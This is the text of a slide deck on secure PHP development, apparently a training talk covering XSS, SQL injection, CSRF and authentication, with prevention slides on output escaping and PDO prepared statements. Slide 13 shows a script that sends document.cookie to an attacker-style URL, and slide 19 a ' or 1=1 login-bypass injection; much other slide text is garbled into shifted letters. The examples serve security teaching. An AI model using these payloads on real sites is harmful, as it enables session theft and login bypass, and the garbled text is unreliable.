Tweet
Tweet

Slide 1

Slide 1 text

Secure PHP Development $ISJT$PSOVUU!FOZHNB

Slide 2

Slide 2 text

1)1%FW :FBST "QQTFD&OHJOFFS IUUQXFCTFDJP IUUQTFDVSJOHQIQDPN

Slide 3

Slide 3 text

Goals #BTJDBQQTFDQSJODJQMFT 7VMOFSBCJMJUJFT&YQMPJUT )BOETPOFYQFSJFODF 5PPMT5FDIOJRVFT

Slide 4

Slide 4 text

IUUQCJUMZPXBTQUPQ

Slide 5

Slide 5 text

5IFSF`T OPTVDIUIJOH BTTFDVSF

Slide 6

Slide 6 text

IUUQTHJUIVCDPNQTFDJPOPUDI /PUDI"7VMOFSBCMF"QQMJDBUJPO

Slide 7

Slide 7 text

IUUQTHJUIVCDPNQTFDJPOPUDI 4FUVQ5JNF PSIUUQOPUDITFDVSJOHQIQDPN

Slide 8

Slide 8 text

No content

Slide 9

Slide 9 text

XSS: Cross Site Scripting

Slide 10

Slide 10 text

*OKFDUJPOPGDPOUFOUJOUPUIFQBHF VTVBMMZ+BWBTDSJQU SFqFDUFEWTTUPSFE QPPSPVUQVUFTDBQJOH

Slide 11

Slide 11 text

$44 +BWBTDSJQU )5.- )5.-"UUSJCVUF 2VFSZWBMVF Context style: foo- var name = “”;
”>foo $url = “http://foo.com?data=“.$input

Slide 12

Slide 12 text

Example ?name=alert(“xss”)

Slide 13

Slide 13 text

Example xmlhttp = new XMLHttpRequest(); xmlhttp.open( 'GET', ‘http://leethack.php?cookies=‘+document.cookie, true); xmlhttp.send(); "TTVNFTDSPTTPSJHJOQPMJDZPG

Slide 14

Slide 14 text

Your Turn

Slide 15

Slide 15 text

Prevention #1 /PUF5IJTJTPOMZGPSB)5.-DPOUFYU

Slide 16

Slide 16 text

Prevention #2 {{ name|e(‘html’) }} {{ name|e(‘html_attr’) }} {{ name|e(‘js’) }} {{ name|e(‘css’) }} /PUF5IJTFYBNQMFSFRVJSFT5XJH

Slide 17

Slide 17 text

SQLi: SQL Injection

Slide 18

Slide 18 text

*OKFDUJPOTQFDJpDUP42-TUBUFNFOUT FYQPTFEBUB CZQBTTBVUI NFDIBOJTNT QPPSJOQVUpMUFSJOH

Slide 19

Slide 19 text

Example $sql = ‘select id from users where username = “‘.$_POST[‘username’].’” and password = “‘.$_POST[‘password’].’”’; password=‘ or 1=1; # select id from users where username = “user1” and password = “” or 1=1; #

Slide 20

Slide 20 text

BEE@TMBTIFT NZTRM@SFBM@FTDBQF@TUSJOH NZTRMJ@SFBM@FTDBQF@TUSJOH

Slide 21

Slide 21 text

BEE@TMBTIFT NZTRM@SFBM@FTDBQF@TUSJOH NZTRMJ@SFBM@FTDBQF@TUSJOH X

Slide 22

Slide 22 text

1SFQBSFETUBUFNFOUT 1%0 .ZTRMJ

Slide 23

Slide 23 text

Your Turn

Slide 24

Slide 24 text

Prevention prepare(‘select id from users’ .’ where username = :user’ .’ and password = :pass’); $stmt->execute(array( ‘user’ => $_POST[‘username’], ‘pass’ => $_POST[‘password’] )); $results = $stmt->fetchAll(PDO::FETCH_ASSOC); ?> /PUF5IJTFYBNQMFSFRVJSFT1%0TVQQPSU

Slide 25

Slide 25 text

CSRF: Cross Site Request Forgery

Slide 26

Slide 26 text

VOWBMJEBUFEGPSNTVCNJTTJPO POBMMTUBUFDIBOHFT XIBU`TUIFTPVSDF  TJNQMF SBOEPNJ[FE GPSFBDIGPSN

Slide 27

Slide 27 text

Example

Slide 28

Slide 28 text

Example

Slide 29

Slide 29 text

Auth*: Authentication & Authorization

Slide 30

Slide 30 text

EJSFDUPCKFDUSFGFSFODF "  EBUBBDDFTT EBOHFSPVTBDUJPOT QPPSVTFSNBOBHFNFOU

Slide 31

Slide 31 text

Your Turn

Slide 32

Slide 32 text

QMBJOUFYUQBTTXPSET OPQBTTXPSEQPMJDZ PWFSMZDPNQMFYQBTTXPSET QBTTXPSEIJOUT

Slide 33

Slide 33 text

No content

Slide 34

Slide 34 text

No content

Slide 35

Slide 35 text

But wait, there’s more…

Slide 36

Slide 36 text

4FDVSJUZ.JTDPOpHVSBUJPO 4FOTJUJWF%BUB&YQPTVSF $PNQPOFOUTXJUI,OPXO7VMOFSBCJMJUJFT 6OWBMJEBUFE3FEJSFDUTBOE'PSXBSET

Slide 37

Slide 37 text

5IBU`TBMMGPMLT !FOZHNB !TFDVSJOHQIQ IUUQTFDVSJOHQIQDPN